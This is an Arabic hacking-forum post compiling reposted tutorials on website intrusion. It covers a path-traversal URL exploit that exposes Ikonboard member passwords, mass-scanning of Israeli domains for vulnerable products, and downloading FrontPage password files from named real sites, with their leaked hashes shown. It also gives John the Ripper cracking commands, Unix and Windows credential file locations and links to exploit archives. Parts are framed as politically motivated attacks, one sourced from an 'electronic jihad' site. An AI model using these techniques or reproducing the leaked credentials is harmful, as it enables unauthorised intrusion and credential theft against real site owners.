[align=center][BIMG]http://img403.imageshack.us/img403/2711/75415822sj7.gif[/BIMG][/align]

[email protected]
Syrian Hacker غير متصل  
قديم 16-02-2008, 02:27   #15
:: عضو مميز ::
 
الصورة الرمزية Syrian Hacker
 
تاريخ التسجيل: Feb 2008
الدولة: System32\Config\SAM
المشاركات: 112
الإختراق العشوائي "
<منقول>
<الكاتب: الكندور>

- ماهو الـإختراق العشوائي Random Hacking
- تطويره بحيث يصبح يبحث على إستثمارات غير الـ CGIScripts
- كيف تستغل اي ثغره بعد الحصول عليها

- ماهو الـإختراق العشوائي Random Hacking
هو البحث في كميه كبيره من المواقع عن ثغره محدده ، وهذا سهل ويعود بمواقع كثيره جدا جاهزه للإختراق ، مثال بسيط جدا ، روح على محرك بحث ، من محركات البحث التي تعتمد على الـ spiders أو العناكب مثل altavista.com وأكتب link:xxxx.cgi or pl ، (إرجع لشرح زورو في رياضيات البحث) مثلا نبحث عن لنك لملف بإسم help.cgi ، link:help.cgi المواقع المردوده لك نتيجه للبحث كلها تملك منتدى Ikonboard ، إفتح واحد منها وأبحث في المصدر الكود HTML عن السكربت الذي بحثت عنه help.cgi لتعرف اين مكانه ، لنفرض مكانه هنا http://www.example.com/cgi-bin/help.cgi
أكتب بعد الملف غير العنوان ليصبح http://www.example.com/cgi-bin/help....on=../members/[member].cgi%00
مع ملاحظه تغيير [member] بإسم عضو وبدون القوسين [] طبعا
سوف يعرض لك معلومات العضو كامله ومن ظمنها كلمة المرور وهذه الثغره لـ المنتدى Ikonboard 2.1.7 وهذا ليس لب موضوعي ولكن هي بدايه ومثال لا تحفظه لأني أحضرت أبسط مثال فقط فيوجد غيره مئات بل آلاف ملفات الـ CGIScript تملك ثغرات مثل هذه واغلب إستثماراتها تكون من خلال url
للحصول على مثل هذه الإستثمارات لثغرات ملفات السي جي آي سكريبت شوف الأرشيف هذا وهو لغته روسيه أعتقد ولكن ما يهم لأننا نبحث عن الـ Exploit أو الإستثمار
http://www.secure.f2s.com/eng_ver/bugs/
وممكن تأخذ إسم المنتج مثلا وتضعه في محرك البحث لـ http://www.securiteam.com/ وتشوف النتائج ، أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا أعجبت بها وهي مختصه في الأمن وليس لـثغرات السي جي آي سكربت ، يعني امن واخبار وكل شئ .... ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ، هو برنامج لتسهيل عمليه الحصول على الأخبار ووو...الخ


- تطويره بحيث يصبح يبحث على إستثمارات غير الـ CGIScripts
الإختراق العشوائي إذا كان فعلا عشوائي ، يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ، لكن ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ، أنا اقول لك كيف ، مثلا إسرائيل اللي الكل يكرهها ، الذين يأمرون الفلسطينيين بأوقاف إطلاق النار ، الكل يكرههم ليس لأجل أنهم يهود ، لا نكرههم لأنهم ظلموا فلسطين ، عندهم موقع فيه آلاف من مواقعهم هذا هو 12610 sites تنتهي بـ co.il و 1104 sites تنتهي بـ org.il و 70 sites تنتهي بـ ac.il و 78 sites. تنتهي بـ gov.il وهذه مهمه ، و 54 sites. تنتهي بـ net.il و 29 sites. تنتهي بـ muni.il و 2009 sites تنتهي بـ com ، و 137 sites. تنتهي بـ net و org - 121 sites. و edu - 4 sites. لعينه ، israel.net - 84 sites. و il - sites. ........عشان تحصل على كل هذه السايت روح الموقع هذا http://iguide.co.il/sites/sites.htm

وفيه كمان محركات بحث

http://www.achla.co.il/
http://www.reshet.co.il/data/index.vs?dw=1
http://www.maven.co.il/
http://www.tapuz.co.il/
http://www.walla.co.il/
http://www.info.gov.il/find.pl

وفيه محرك أعدم منها واللي هو altavista.co.il

المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ، يستخدم اللغه التي يتقنها ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها

العمليه الثانيه هي البحث فيها كلها عن منتج ، مثلا w3-msql/ ، الطريقه سهله جدا ، أولا يتم الشبك مع بروكسي مثلا proxy.isp.net.sa :8080 وثم يرسل له أمر GET ، مثلا ترسل للبروكسي


GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Host: www.com.il
Proxy-Connection: Keep-Alive

وهو يطلب من البروكسي أحضار الموقع http://www.com.il/cgi-bin/ ، يتضح طلبنا لـ cgi-bin/w3-msql/ ، في الحقيقه لا نبحث عن ثغرات سي جي آي ، ولكن نبحث عن كل المواقع التي يوجد بها المنتج WWWMSQL ، يعني المواقع الإسرائليه مثلا التي جمعناها في ملف تكست كلها تأخذ واحد واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن cgi-bin/w3-msql وثم يحفظ رد البروكسي في ملف خارجي ، وهكذا حتى ننتهي من كل المواقع ، وثم نفتح الملف ونشوف التي تم إيجاد المنتج WWWMSQL داخها والتي لم يوجد ، ونتوجه الى سيكيورتي فوكس والا سيكيورتي تيم والا أي موقع يعجبك وابحث عن w3-msql ، مثلا في سيكوتي تيم نجد Exploit لـ w3-msql يمكن تطبيقه من المتصفح ، وهو هنا http://www.securiteam.com/exploits/2WUQBRFS3A.html
طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا Random Hacking يعني إختراق عشوائي ، ولكن لو فعلا بحثت عن w3-msql في المواقع الإسرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجد شئ ، ممكن تبحث عن /_vti_pvt/ لترصد كل المواقع التي فيها فرونت بيج ، وطبعا بعد ما يتم حفظ كل المعلومات المسترجعه من البروكسي تكون بشكل HTML عشان كذا أنت خل الملف يكون بنسق *.html وافتحه وتجد كل المواقع ، اللي كتب عنها ..The page cannot be displayed واللي Forbddien واللي ....not found ....الخ ، من هذه الردود تعرف اللي نت فاوند والا موجود ولكن غير مسموح بالوصول له ..الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود .....والباقي عليك


- كيف تستغل اي ثغره بعد الحصول عليها
إذا كانت url ما يبغا لها فلسفه ، كود c وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون ثاني لـه ولكن بلغه perl أو Shell *.sh وهو الذي يقابل Batch في ويندوز وتحدثنا عنها في كوكب لغات البرمجه ، من الدوس بعد ما تثبت أكتيف بيرل أكتب perl exploit.pl إذا كان الـ exploit بلغه بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ، وهذه الأشياء تكون مكتوبه بين علامات التعليقات وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ، في هذه الناحيه لا تطلب شرح بالصور إذا رجع لك رد طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علامة < وثم مسافه وإسم الملف مثلا perl exploit.pl > log.htm
وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ، لأن بعض الـ Exploit كتب في الإصدار أربعه وممكن خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله يطلب خبره في اللغه ، وعلى فكره ليونكس (أعمل على RedHat 6.2 )فيه مفسر بيرل ممتاز جدا افضل من أكتيف بيرل بعشرات المرات.
انتهى،،،

" الطريقة الصحيحة والمثلى في اختراق المواقع "

<منقول>
<الكاتب: marwan911 >

اول خطوة في الاختراق واللي هي اخذ المعلومات

يعني نعرف الموقع الفلاني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.

الملقمات اشهرها اثنين

IIS: من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها)

apache: من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

طيب

الحين عندنا موقع

وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها

عندك الموقع http://www.netcraft.net

ادخله

تلاقي مربع

هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق

مثلا نحط موقع البيت الابيض اللي هو whitehouse.org

ملاحظة: نكتبه من غير http:// ولا / اللي بالاخير

http://uptime.netcraft.com/up/graph....whitehouse.org

راح يطلع لنا التالي

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000
طيب

الحين عرفنا معلومتين مهمتين

اول شيء انه شغال على الملقم IIS5.0

ثاني شيء شغال على نظام ويندوز 2000

حلو

اول شيء نجرب ثغرات IIS5.0 عليه (راح احطها بعد الموضوع)

إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000 (راح احط الموقع بعد الموضوع)

طيب

الحين فيه حاجة اسمها يوني كود

هذه تخترق فيها عن طريق المتصفح

وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. راح احط امثلة عليها.

طيب لنفرض انه ماطلع فيها ثغرات؟

نشوف محتويات الموقع نفسه

نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي بعد الموضوع.

طيب لو كان السيرفر اباتشي؟

خلونا ناخذ مثال موقع ارانك www.arank.com

لو حللناه بالنيت كرافت راح نشوف النتيجة التالية

The site www.arank.com is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

طيب هنا يهمنا ثلاث اشياء

الملقم وهو apache 1.3.20 و دعم فرونت بيج FrontPage/5.0.2.2510 وهذه مليانة ثغرات والثالث النظام وهو Linux

طيب

الملقم

اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.

نشوف دعم الفرونت بيج

زي ماقلنا الفرونت بيج مليان ثغرات

وثغراته قوية وكثيرة تقريبا

منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة

داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف

طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM

وهذا من موقع قودي http://www.goody.com.sa/_vti_pvt/service.pwd

طيب الحين goodyco اليوزر والباسس مشفر واللي هو CalXS8USl4TGM

وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier

تنزله وتحط الملف المشفر (مع اليوزر) بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي john -i PASSWORD.FILE

وعاد استناه يطلع لك الباسس

طيب نروح للفقرة الثالثة واللي هي النظام

زي ماشفنا النظام هو لينكس

لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر

لكن هنا راح تواجهك مشكلتين

اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول telnet واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته

المشكلة الثانية لازم يكون عندك لينكس اصلا

علشان ثغراته بلغة ال c وهذه ماتشتغل إلا عاللينكس فقط

================

http://neworder.box.sk/ هذا الموقع مفيد جدا تكتب مثلا (فوق بالمربع اللي عاليمين) IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته

http://www.ussrback.com/ الموقع هذا خطير جداً جداً تروح ل EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود.

انتهى،،،








" نبذه يسيرة ومبسطة عن كيفية اختراق المواقع "

<منقول من منتديات كويت تن>
<الكاتب:

ركز معي
هذا سؤال يحير الجميع بالذات المبتدئين . عليك بأتجاه للموقع المراد اختراقه
حيث يجب عليك دراسة الموقع كاملا من حيث عدة عوامل اهمها

1- ) نظام السيرفر والمستخدم في الموقع وينقسم السيرفر الى نوعين

ا ) - النوع الاول هو IIS ( اي اي اس )

ب ) - النوع الثاني apachc ( اباشي )

2- ) ملاحظة وجود محرك بحث في الموقع ام لا

3- ) معرفة وقت الذروه لزوار الموقع ووقت الخمول

4- ) معرفة الأيبي للموقع

تقريبا هذه اهم العوامل المتخذه كعوامل مطلوبه جدا لتنفيذ العمليه وهذه تاخذ

وقت حيث ان كل شي مايجي بالساهل


سبق وذكرنا السيرفر IIS والداعم لبعض المواقع وهذا امره تقريبا سهل حيث ان

اغلب من يستعمل هذه الطريقه هم من الهواه

حيث ان ثغرات تقريبا سهله واختراقها ايضا مرتبط بأن تكون الثغرات التي لديك

جديده و طااازه

وشوية صبر بالأستعانه بالله ثم ببعض البرامج المساعده وسوف تححق نجاحاتك
بأذن الله .
سيرفر apachc وهذا السيرفر قوي جدا وغالبا لا يعمل على البحث عن ثغراته

سوى المحترفون . لأنه يتطلب عدة امور لا يستطيع عملها الا من له خبره

بنظام ليونكس ويعرف بعض لغات البرمجه .
انتهى،،،






" (<س&ج>) في اختراق المواقع للمبتدئين "

<منقول من منتدى ابن مصر>
<الكاتب: القناص العربي>

س*: السلام عليكم أخي القناص العربي
ج*: أهلين القناص العربي المزيف :D

س*: أحم أحم , أنا كنت عايز أسألك شوية أسألة في الهاكنج.
ج*: تفضل حبيبي , بس ياريت ماتكون عن اختراق الأجهزة , ولعب العيال هذا !!


س*: لا لا , أنا تطوت كثير
ج*: أوكى تفضل


س2: لقد سمعت كثيرا عن ثغرات الفرونت بيج , هل يمكنك توضيح طريقة استخدام هذه الثغرة .
ج2: بالتأكيد حبي ومن عيوني الاثنين :D
طبعا ثغرات الفرونت بيج بتكون موجودة في أنظمة التشغيل NT & Unix التي يدعم سيرفراتها الـ FrontPage , وبتمكنك من معرفة كلمة سر الأدمين تبع الموقع
وكلمات السر هذه بتكون موجودة في الملفات التالية:
Administrator.pwd
Administrators.pwd
Authors.pwd
Users.pwd
التي بتكون عادة في المجلد _vti_pvt
مثل هذه الملف مثلا: http://www.tradesystemlab.com/_vti_pvt/service.pwd
وبعد فتح الملف service.pwd هتلاقي مكتوب بداخله هكذا تقريبا:
# -FrontPage-
tradesys:FpNTpIDWSk872
وهذه كلمة السر المشفرة واسم المستخدم


س3: أووووه واااااو ممتاز , ولكن كيف أدخل على الموقع كأدمين بهذه الكلمات ؟؟ :S
ج: يمكنك استخدام برنامج اف تي بي مثل برنامج WS_FTP , أو ضع بدل www في عنوان الموقع كلمة ftp مثل هذا: ftp.ebnmasr.com وقم بموضعه في شريط العنوان , وسيطلب منك الموقع اسم المستخدم وكلمة المرور للموقع


س4: مشكور حبيبي ولكن ليش مايدخل باسم المستخدم وكلمة السر هذه : tradesys:FpNTpIDWSk872 ؟؟ (N)
ج4: بكل بساطه لأنها مشفرة !! , يمكنك فك تشفيرها عن طريق برنامج مثل برنامج John The Ripper , نزله من هنا: http://www.openwall.com/john


س5: أها , لكني ماأعرف أستخدم هذا البرنامج , ممكن تشرحهولي أخي العزيز القناص لو سمحت ؟؟
ج5: لاتستأذن مني ياولد !! , أنا في الخدمة , شوف: انت أول ماتنزل البرنامج وتفك ضغطه , هيكون فيه مجلدين: doc & run , الي يهمنا هو مجلد run , شوف: عشان تسهل على نفسك وبدل ماتفتح الدوس وتدخل على مجلد البرنامج وهالمشاكل وكمان البعض ما بيعرف يعمل هالأشياء :p :
ابحث في جهازك عن: command.com وقم بنسخه والصقه في مجلد run , أوكى ؟؟
وجيب كلمة السر هذه: tradesys:FpNTpIDWSk872 وحطها في ملف txt باسم passwd مثلا وضعه في مجلد run , ولا تقم بفتح john.exe , افتح command.com واكتب فيه الأوامر التالية:
john -single passwd.txt >> ليبحث لك عن الكلمات السرية التي تكون مطابقه لاسم المستخدم
john -i:Digits passwd.txt >> ليبحث لك عن الأرقام فقط
john -i:Alpha passwd.txt >> ليبحث لك عن الحروف الصغيرة
john -i:all passwd.txt >> ليبحث لك عن جميع الاحتمالات , ( وأنا على طول أستخدم هذا الأمر , عشان كده بتطول عملية الفك معي :D )
وبعدما ينتهي البرنامج من فك الكلمة ستجد كلمة السر المشفرة والمفكوكه بالملف هذا: john.pot


س6: يااااااه , البرنامج طول كثير , متأكد أنه هيفك تشفيرها ؟؟
ج6: أيوووووه لازم يفك تشفيرها في النهاية , حتى لو أخذ أسبوع ;) , لأنه بيجرب جميع الاحتمالات.
وممكن تعرف حالة البرنامج بالضغط على أي زر من لوحة المفاتيح


س7: الحمد لله , خلاص انفكت كلمة السر (Y) , لكن وين اسم المستخدم ؟؟
ج7: في كلمة السر هذه: tradesys:FpNTpIDWSk872 , هيكون اسم المستخدم: tradesys ( يعني الكلمة الي بتكون قبل علامة : )


س8: قنااااااص , ممكن تقولي كيف جبت هالثغرة من الموقع ؟؟ :$
ج8: هههههههههه ,,, وليه هالوجه الخجلان ;) , أنا بصراحة جبتها بالبحث العشوائي , ولكن انت لو كان عنك موقع ممكن تعمل عليه سكان ببرنامج فحص مثل برنامج عمران ( المفضل لدي :D ) عشان تطلع الثغرات الموجودة بالموقع


س9: طيب أنا عندي سؤالين عالجواب الي فات ده , هأسأل واحد الأول , ايه طريقة البحث العشوائي هذه ؟؟
ج: أحم أحم , هذه الطريقة : انك تبحث عن ثغرة معينة في محرك بحث يستخدم الـ spiders عشان تلاقي مواقع كثيييرة فيها الثغرة هذه , في طبعا مواقع كثيرة بتستخدم السبايدرز , لكن لن أقولك لك على أي واحدة منها , الا هذا الموقع: walla.co.il وطبعا هذا موقع اسرائيلي , عشان معظم النتائج تكون مواقع اسرائيلية ;) .


س10: ممممم , كيف يعني تبحث عن ثغرة معينه ؟؟ , مافهمتك زين !!
ج10: أنا والله ماأستخدم هالمواقع الا للبحث عن ثغرات الفرونت بيج :$ , يعني انت مثلا عايز تبحث عن الثغرة التي تم ذكرها سابقا , هتكتب ايه ؟؟ , مانت كاتب غير كلمة واحدة , هذه: service.pwd


س11: أهاااااا , مشكور حبيبي , كنت عايز أسألك كمان عن كيفية عمل برامج السكان على الثغرات
ج11: البرامج هذه بتكون فيها مجموعة كبيرة من الثغرات أو الـ EXPLOITES , وبتبدأ تجرب ثغرة ثغرة على الموقع , وتطلعلك النتائج , وفي موقع رهيييب عشان تجيب منه الـ EXPLOITES , هذا هو: http://www.ussrback.com/ .


انتهى،،،




" برنامج CgiScaner للبحث عن الثغرات "

<منقول>
<الكاتب: بو هاجر>

هنا برنامج رائع للبحث عن الثغرات

رقم1 خروج.
رقم2 أظهار الكودات المستخدمة.
رقم3 بدأ البحث.
رقم4 تضع العنوان للضحية.
وأترك البرنامج وسوف يظهر لك الثغرات الموجودة فى الموقع.

وصلة البرنامج..
http://mypage.ayna.com/vox99/cgiscan3.zip

انتهى،،،



" شرح برنامج سوبر سكان لمعرفة المنافذ المفتوحة في المواقع "

<منقول من منتديات شامل نت>
<الكاتب: مشاريو>

تعريف بالبرنامج ::: هذا البرنامج يقوم بالبحث عن المنافذ المفتوحه في جهاز

الضحيه ,,, لان بعض البرامج يكون فيها الباحث ضعيف ولا يصيد

اي اي بي به منفذ مفتوح ومن امثلة ذلك برنامج السب سفن جولد ,, رغم ان

البرنامج وقوة اتصاله ممتازه الا ان الباحث ضعيف فنستخدم هذا البرنامج كاداة

مساعده ’’’’’


" اماكن وجود ملف الباسورد في أنظمة التشغيل "

<منقول من منتدى الحلم>
<الكاتب: بلاك هنتر>

في نطم ليونكس
/etc/shadow

في نظم صن ميكروسيستيمز
/etc/shadow

في نظم الBSD بصفه عامه
/etc/master.passwd

في نظم السيليكون جرافيكس SGI المسمى ARIX
/etc/shadow

نظام اي بي ام المسمى AIX
/etc/security/shadow

نظم يونكس بصفه عامه ((اتش بي يو اكس - (( ترو يونكس 64 (( خاص بالمنفريم ونظم الريسك 64 وبعض منتجات الالفا )) )) ))
/etc/shadow

((اغلب هذه الاصدارات تعتمد تشفير MD5 القوي ))


نظم ويندوز بصفه عامه (( 2000 - NT - XP ))
(( الملف المفعل بتشفير LanMan ))
/winnt/system32/config/sam
((هذا الملف مغلق عادة الا عند الاقلاع من النظام ولا يسمح بفتحه او نسخه طالما النظام يعمل حتى ولو كان لديك صلاحيات الادمنيستريتور ))


((الملف الاحتياطي ))
/winnt/repair/sam or sam._


في الويندوز اكس بي البروفيشينال واصدارات الويسلر (( سيرفر - ادفانسد سيرفر ))
لن تجد الويندوز في مجلد WINNT
ولكن سيكون كالويندوز العادي Windows.

انتهى،،،








" اختراق الموقع (الجزء الأول) "

<منقول من موقع الجهاد الإلكتروني>


مقدمه :

مرت فترة طويلة منذ الدرس السابق ولا اعرف لماذا مر كل هذا الوقت دون أن ابدأ في كتابة هذا الدرس .. ربما لصعوبة الموضوع و تشعبه .. و لكن ها قد حان الوقت لمجابهة الصعوبة و التشعب و تقديم و لو حتى فكرة بسيطة عن هذا الموضوع الممتع ..


سأعيد تعريف Telnet من جديد و لكن بطريقه اكثر بساطه ..
Telnet هو برنامج يستخدم في إنشاء وصله بين جهازين ،و الجهاز المتصل يستخدم عنوان الجهاز المستهدف و رقم المنفذ Port الذي سيتم الاتصال عليه ،و الجهاز المستهدف (الخادم) يشغل برنامج آخر (Daemon) يستمع على هذا المنفذ و تتم عمليه الإرسال والاستقبال باستخدام أحد البروتوكولات .
تشبيه من حياتنا العملية : نفترض أن هناك رجل في فرنسا (المستهدف) و أنت (المتصل) تريد إقامة حوار معه (وصله) و أنت في مصر .. فلابد لك من استخدام وسيله اتصال (Telnet) و لنفرض أنها الهاتف الذي لابد للرجل أن يضعه على أذنه (Daemon) لكي يسمعك .. و لنفرض أيضا أن هذا الرجل لا يتحدث العربية .. إذن فلابد لك من استخدام الفرنسية (البروتوكول المستخدم) حتى تتحدث (الإرسال والاستقبال) بحريه .


مما سبق نستنتج أن Telnet هو مجرد وصله (مثل الهاتف) .. و انه لابد لنا من معرفة البروتوكول المستخدم في الاتصال حتى ننجح في الإرسال و الاستقبال . كما انه لابد لنا من أن نعرف أيضا أنه لابد من برنامج Daemon يتسمع على المنفذ المراد الاتصال عليه .


استخدام Telnet ك FTP Client
المنفذ الذي سيتم الاتصال عليه في حاله استخدامنا بروتوكول نقل الملفات FileTransfer Protocol في الغالب سيكون 21 ..

أين الصعوبة إذن ؟
الصعوبة تكمن في أننا لكي نستخدم Telnet ك FTP Client يجب علينا الإلمام بقدر كبير ببروتوكول FTP !!
و لكن هذا لن يمنعني من عرض بعض الأمثلة لإظهار كيفية التعامل مع هذا البروتوكول ..

بدء الاتصال
1- قم بتشغيل Telnet و شبك على ftp.zdnet.com بالمنفذ 21
و هذا ما سيظهر لك

Sources Code - شفرة

220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.



و السطر السابق يسمي Banner الخاص بال FTP Daemon المستخدم في موقع zdnet و هي تختلف باختلاف الموقع الذي سيتم التشبيك عليه . و الرقم الموجود في البداية يدل على نجاح الاتصال و هو رقم ثابت .
2- الخطوة التالية هي الولوج باستخدام اسم المستخدم Username و كلمة السر Password .. بما أن zdnet تدعم المستخدم Anonymous سيتم استخدامه في الولوج للنظام كالتالي:
ستكتب

Sources Code - شفرة


user anonymous



و سيستجيب الخادم بالتالي

Sources Code - شفرة


331 Guest login ok, send your complete e-mail address as password.



ثم تكتب أنت التالي

Sources Code - شفرة


pass @zorro



و بالطبع عند الولوج بالمستخدم Anonymous تقوم بإعطاء عنوان البريد الإلكتروني الخاص بك ككلمة السر .. و إذا لم ترد إعطاء بريدك فيمكنك أن تكتب أي شئ يأخذ شكل البريد (أي يحتوي على الرمز( @
و سيستجيب الخادم بالتالي

Sources Code - شفرة


230-You are user #552 of 2000 simultaneous users allowed.
230-
230 Logged in anonymously.




و بالطبع تلك الإستجابه قد تختلف من موقع لآخر .. إلا في الرقم في بداية كل سطر ..
أنت الآن قد قمت بالولوج إلى الخادم بنجاح .


بعد أن تمت عمليه الولوج للنظام يجب إنشاء وصله لإرسال واستقبال البيانات (قائمه بالملفات الموجودة أو الملفات ذاتها) .. إذن ما الذي كنا نفعله منذ قليل ؟!! ما قد فعلناه منذ قليل هو إنشاء وصله لإرسال الأوامر للنظام و استقبال استجابة النظام على الأوامر .
و لكي ننشئ تلك الوصلة ،هناك طريقتين
الأولي : تنشئ هذه الطريقة الوصلة بان يرسل الزبون (أنت) رقم IP الخاص به و المنفذ المفتوح الذي يستطيع الخادم استخدامه في إرسال البيانات .
و لكن تلك الطريقة تتطلب منك فتح أحد المنافذ على جهازك و هذا سيتطلب برنامج خاص لفتح هذا المنفذ .. و لذلك لن نستخدم تلك الطريقة .
الثانية : تنشئ هذه الطريقة الوصلة بان يرسل الزبون الأمر PASV

Sources Code - شفرة


PASV




و سيرد الخادم برقم IP الخاص به و المنفذ المفتوح (على الخادم بالطبع) الذي يستطيع الزبون (أنت) الاتصال عليه ..
مثال

Sources Code - شفرة


227 Entering Passive Mode (207,189,69,61,12,41)




و الرقم الطويل الموجود بين الأقواس تفسيره كالتالي ..
أول أربع مجموعات (من اليسار) هو ال IP الخاص بالخادم و في هذه الحالة يكون 207,189,69,61 .. أما الرقمان التاليان فيمثلان رقم المنفذ و يتم حسابه كالتالي
12 × 256 + 41 = 3113


و لذلك فالخطوة التالية التي يجب على الزبون اتباعها هي فتح وصله جديده مع الخادم على المنفذ 3113 .. ولكي تقوم بمثل هذا الأمر يتوجب عليك فتح نافذة Telnet جديده و تشبك على ftp.zdnet.com بالمنفذ 3113 ..
إذن عندما تريد أن ترسل أحد الأوامر سترسله من النافذة الأولى و النافذة الثانية ستظهر بها البيانات ..
مثال
عندما ترسل الأمر LIST )يستخدم لعرض محتويات الدليل) في النافذة الأولى

Sources Code - شفرة


LIST




سيستجيب الخادم بالتالي في النافذة الأولى أيضا

Sources Code - شفرة

125 Data connection already open; Transfer starting.




و ستظهر محتويات الدليل في النافذة الثانية ثم سيتم غلق الاتصال في النافذة الثانية بمجرد إتمام عرض محتويات الدليل .

و هكذا كلما أردت أن ترسل أمر عرض محتويات دليل ما أو استقبال أو إرسال ملف ما ، يجب أن تبدأ بأمر PASV .. ثم تنشئ اتصالا جديدا بعد حساب رقم المنفذ باتباع الخطوات السابقة .



إلى هنا و أظن أنني قد تماديت .. و لكنني لم استطع أن امنع نفسي من مشاركتكم بهذا الموضوع الممتع (ممتع بالنسبة إلي) .



ملاحظات هامة
- لربما تتساءل الآن .. ألا أستطيع بدلا من كل هذا الهراء أن استخدم برنامج جاهز مثل CuteFTP ؟!! بالطبع تستطيع و لكن لن يضرك أن تعلم شيئا عن البروتوكول الذي تستخدمه و ربما بعد تعلم البروتوكول تستطيع أن تصنع برنامجك الخاص
- اقرأ الدرس مره و مرتين حتى تستوعب الفكرة تماما ثم اسأل فيما شئت
- لتعلم اكثر عن هذا الموضوع قم بزيارة المواقع التالية
http://www.vbip.com/winsock/winsock_ftp_01.asp
(ينصح به بشده)
http://www.vbip.com/winsock/winsock_ftp_ref_01.htm (ينصح به بشده)
http://www.cis.ohio-state.edu/htbin/rfc/rfc0959.html (لمن اراد التعمق في البروتوكول).


انتهى،،،



" اختراق المواقع (الجزء الثاني) "

< منقول من موقع الجهاد>
<الكاتب: الكندور>

الإختراق :
~~~~~~~~~

- المقدمة .
- كيف أجمع معلومات حول الموقع ؟
- كيف يتم كشف نقاط الضعف ؟
- كيف يمكن إستغلال نقاط الضعف المكتشفه ؟
- ماهو ملف كلمة المرور password file ؟
- بماذا يفيدني هذا الملف ؟
- كيف يمكن معرفة كلمة السر من خلال ملف الباسورد password file ؟
- ماالفرق بين إذا كان الملف (مشفر encryption) وإذا كان (مضلل shadowed) ؟
- وماذا لو كان ملف كلمة المرور مشفر ، كيف يتم كسره ؟
- ولو كان ملف كلمة المرور مضلل ، ماذا علي ان أعمل ؟





المقدمة :-
~~~~~~~~~
أعد هذا المستند للباحثين وليس لمن أراد أن يخترق موقع فقط ! أنا أعتبر أن لديك الخبره اللازمه لفهم كل ما أتحدث عنه ، لا تتوقع إني بقول لك نزل برنامج ( مثل Void Eye ) أو غيره وحط لك في هذا المستند شرح بالصور وقول لك إخترق مواقع ، العمل المقزز هذا لن نتطرق له أبداً


- كيف أجمع معلومات حول موقع ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
أول خطوه تصلحها هي بورت سكان ، أنصحك تستخدم nmap المشهوره والأقواء على الإطلاق،يمكن أن تبحث عنها هذا إذا ما لقيتها في الموقع www.inscure.org/nmap وهي تعمل على نظام ليونكس ، إذا أردت برنامج يعمل على ويندوز انصحك بـ SuperScan ، عليك البحث عنها في الإنترنت ، سوف تجد آلاف المواقع التي تقدمها لتنزيل ، ومن الممكن أن تستخدم نصوص Perl لعمليه البحث ، لغه Perl أصبحت اللغه محبوبه لدى جميع الهاكر بعد C
بعد الحصول على النتائج ، مثلا نصلح تجربه على الموقع http://www.7lem.com/ ) بعض برامج البحث تطلب وضع رقم الآي بي للموقع ، ولاتقبل الدوماين عندها إستخدم ping لتعرف رقم الآي بي)
تأتي النتائج ، البورتات (21 - 22 - 23 - 25 - 37 - 110 - 143 - 513 - 514 - 587) ويوجد منافذ أخرى لكن لن نهتم لها هنا ، نقوم بعمليه نزع التواقيع للمنافذ...

ماهي عمليه نزع التواقيع للمنافذ؟
من المعروف أن المنفذ فتح من قبل تطبيق ، عند الإتصال بهذا المنفذ فسوف يتم إرجاع رد اليك ، مثلا لو إتصلت بالبورت 23 وهو لتلنت ، وموقع http://www.7lem.com/ توجد به خدمه تلنت ، ويتضح هذا من عمليه مسح المنافذ ،الإتصال بخدمه اتلنت
telnet http://www.7lem.com/
